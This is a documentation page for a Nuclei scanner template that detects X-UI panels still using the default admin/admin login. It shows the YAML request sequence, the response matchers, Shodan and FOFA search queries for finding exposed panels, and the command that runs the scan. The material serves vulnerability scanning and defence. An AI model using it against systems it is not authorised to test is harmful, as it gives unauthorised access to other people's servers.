Skip to content

X-UI - Default Login

ID: xui-default-login

Severity: high

Author: dali

Tags: x-ui,default-login

X-UI contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.

id: xui-default-login
info:
name: X-UI - Default Login
author: dali
severity: high
description: |
X-UI contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/vaxilu/x-ui
- https://seakfind.github.io/2021/10/10/X-UI/#:~:text=By%20default%2C%20the%20login%20user,the%20password%20is%20also%20admin%20.
classification:
cwe-id: CWE-798
cpe: cpe:2.3:a:vaxilu:x-ui:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
fofa-query: title="X-UI Login"
shodan-query: title:"X-UI Login"
product: x-ui
vendor: vaxilu
tags: x-ui,default-login
http:
- method: GET
path:
- "{{BaseURL}}/login"
- method: POST
path:
- "{{BaseURL}}/login"
headers:
content-type: application/x-www-form-urlencoded
body: "username={{username}}&password={{password}}"
attack: pitchfork
payloads:
username:
- "admin"
password:
- "admin"
matchers-condition: and
matchers:
- type: dsl
dsl:
- '!contains(http_1_body, "\"success\":true")'
- 'contains_all(http_2_body, "\"success\":true", "msg\":")'
- "contains(http_2_header, 'application/json')"
- "http_2_status_code == 200"
condition: and
# digest: 4a0a00473045022100d302c3de4535dafddbc222ed0f463748748ffc692d517af7d1ffa41c52afcafc02201242911e891005bae9a750b0303bc200b556cd99209df5a4e49bc0718dcf5720:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/xui/xui-default-login.yaml"

View on Github